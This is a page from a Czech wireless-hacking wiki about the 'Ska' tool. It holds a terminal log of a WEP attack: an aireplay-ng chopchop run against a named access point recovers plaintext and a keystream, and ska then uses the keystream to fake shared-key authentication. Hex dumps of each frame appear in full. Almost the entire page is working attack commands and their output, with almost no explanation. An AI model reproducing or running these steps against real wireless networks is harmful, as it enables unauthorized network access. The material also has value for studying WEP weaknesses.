Ska

Z WiKi AIRdump.CZ

Přejít na: navigace, hledání

Aireplay 

aireplay-ng -4 -a 00:02:72:57:DE:53 eth2

Read 335 packets... 

       Size: 329, FromDS: 1, ToDS: 0 (WEP)

            BSSID  =  00:60:xx:xx:xx:xx
        Dest. MAC  =  FF:00:FE:FF:FF:FB
       Source MAC  =  00:61:xx:xx:xx:xx

       0x0000:  0842 0000 0100 5e7f fffa 0002 7257 de53  .B....^....rW.S
       0x00d0:  622f 22db 0afe b057 9761 49bb ae3b 568b  b/"....W.aI..;V.
       --- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0111-222222.cap 

Offset  328 ( 0% done) | xor = 57 | pt = A0 |  424 frames written in  1273ms
Offset  327 ( 0% done) | xor = 39 | pt = 4F |  364 frames written in  1092ms
--cut--
Offset   36 (98% done) | xor = 08 | pt = 45 |   19 frames written in   128ms
Offset   34 (99% done) | xor = B5 | pt = 08 |  147 frames written in  1026ms

Saving plaintext in replay_dec-1111-222222.cap Saving keystream in replay_dec-1111-333333.xor

Completed in 339s (0.86 bytes/s)


Ska 

./ska wlan0 franta_AP 00:60:xx:xx:xx:xx 00:61:xx:xx:xx:xx replay_dec-0194-000817.xor

Step1: Auth 

       Size: 30, FromDS: 0, ToDS: 0
       0x0000:  b000 3a01 0002 7257 de53 000f e23f 2823  ..:...rW.S...?(#
       0x0010:  0002 7257 de53 b001 0100 0100 0000       ..rW.S........


Step2: Response 

       Size: 160, FromDS: 0, ToDS: 0
       0x0000:  b000 3a01 000f e23f 2823 0002 7257 de53  ..:....?(#..rW.S
       0x0010:  0002 7257 de53 003a 0100 0200 0000 1080  ..rW.S.:........
       0x0020:  4187 7617 80da a4e9 1cc6 c63c 6a9a efc4  A.v........<j...
       0x0030:  ee75 15d1 a6de bec7 a83d 7dc1 5c00 6287  .u.......=}.\.b.
       0x0040:  dfe6 fb2c aa42 fadf ae2e 52a3 67f9 2b3e  ...,.B....R.g.+>
       0x0050:  ed63 84b4 2b3e 0cc9 45c6 66dd 85c3 0fea  .c..+>..E.f.....
       0x0060:  972d 64ca 2fec fe39 0b68 d56f 7671 6e31  .-d./..9.h.ovqn1
       0x0070:  6081 e51c b2c4 b47f d1a9 99fd 651d 25ea  `..........e.%.
       0x0080:  5ca4 4c30 c0c5 63c8 8b95 81c0 4326 2964  \.L0..c.....C&)d
       0x0090:  4a0d fd72 4b86 9610 1a90 3b10 77c0 8f21  J..rK.....;.w..!

IV + KeyIndex used: 50f029 00

PRGA XOR Values used to fake auth: 

       Size: 301, FromDS: 0, ToDS: 1
       0x0000:  db91 7ae7 5160 b54d 0858 4b93 c9e5 28e3  ..z.Q`.M.XK...(.
       0x0010:  71fb 3593 7974 44cc 6a56 9c9d e3d7 6aef  q.5.ytD.jV....j.
       0x0020:  5268 ceb1 3f1a 4f45 ccb6 7b7f f9eb b9f8  Rh..?.OE..{....
       0x0030:  ac7c daaa 8438 7b3a 3e8c 5190 5b19 7e84  .|...8{:>.Q.[.~.
       0x0040:  196f a9b2 e45b 64f7 9087 2028 dc90 30ca  .o...[d... (..0.
       0x0050:  6713 edfd cdfc 31ca 4ce4 bb53 9813 4454  g.....1.L..S..DT
       0x0060:  edbc 8cd3 8935 011c d841 98f9 e083 d6f9  .....5...A......
       0x0070:  876f 4140 b715 f5f8 f2a4 a455 571d c5e6  .oA@.......UW...
       0x0080:  4180 7b8e 8b5c 0eeb 8bc7 75c6 b688 7e98  A.{..\....u...~.
       0x0090:  9ac9 6c87 4db4 1422 7393 91e4 d24b 32ac  ..l.M.."s....K2.
       0x00a0:  4c38 5aec 42d1 e9fa 8327 99cb de38 d7aa  L8Z.B....'...8..
       0x00b0:  07b0 223c 580f 51a8 6e8e 8a36 fb08 3fde  .."<X.Q.n..6..?.
       0x00c0:  a331 05ce 2024 47e7 4286 806b fa1f 7351  .1.. $G.B..k..sQ
       0x00d0:  0b55 8cff a90c 1d43 23cf 6152 1f1b d348  .U.....C#.aR...H
       --- CUT ---

Plaintext of packet to be encrypted and sent back: 

       Size: 164, FromDS: 0, ToDS: 0
       0x0000:  b000 3a01 000f e23f 2823 0002 7257 de53  ..:....?(#..rW.S
       0x0010:  0002 7257 de53 003a 0100 0300 0000 1080  ..rW.S.:........
       0x0020:  4187 7617 80da a4e9 1cc6 c63c 6a9a efc4  A.v........<j...
       0x0030:  ee75 15d1 a6de bec7 a83d 7dc1 5c00 6287  .u.......=}.\.b.
       0x0040:  dfe6 fb2c aa42 fadf ae2e 52a3 67f9 2b3e  ...,.B....R.g.+>
       0x0050:  ed63 84b4 2b3e 0cc9 45c6 66dd 85c3 0fea  .c..+>..E.f.....
       0x0060:  972d 64ca 2fec fe39 0b68 d56f 7671 6e31  .-d./..9.h.ovqn1
       0x0070:  6081 e51c b2c4 b47f d1a9 99fd 651d 25ea  `..........e.%.
       0x0080:  5ca4 4c30 c0c5 63c8 8b95 81c0 4326 2964  \.L0..c.....C&)d
       0x0090:  4a0d fd72 4b86 9610 1a90 3b10 77c0 8f21  J..rK.....;.w..!
       0x00a0:  d959 2545                                .Y%E


Step 3: Sending packet with encrypted challenge: 

       Size: 168, FromDS: 0, ToDS: 0
       0x0000:  b040 3a01 0002 7257 de53 000f e23f 2823  .@:...rW.S...?(#
       0x0010:  0002 7257 de53 c001 50f0 2900 da91 79e7  ..rW.S..P.)...y.
       0x0020:  5160 a5cd 49df 3d84 493f 8c0a 6d3d f3af  Q`..I.=.I?..m=..
       0x0030:  13ee ab08 8423 894c 4509 d428 fa55 b370  .....#.LE..(.U.p
       0x0040:  631a 2dc2 1350 8053 53a9 4327 0252 8809  c.-..P.SS.C'.R..
       0x0050:  e3c1 5004 d3ef d524 7027 724d 5ca9 cf6f  ..P....$p'rM\..o
       0x0060:  6198 6b1d 07aa 44e2 f37c cef3 6c7b 3892  a.k...D..|..l{8.
       0x0070:  bb8d 5ffb 2c65 5e4f 2ad7 f02b 3c15 152e  .._.,e^O*..+<...
       0x0080:  ec28 24f6 84e5 d4c9 2046 b531 0cfa c080  .($..... F.1....
       0x0090:  f433 dc9c b8a9 5927 1c9b 53f6 5b10 409e  .3....Y'..S.[.@.
       0x00a0:  fc9c 81ca 529e 5083                      ....R.P.

Not answering... RETRYING!

Viz. take MDK

Citováno z „http://wiki.airdump.cz/Ska
Osobní nástroje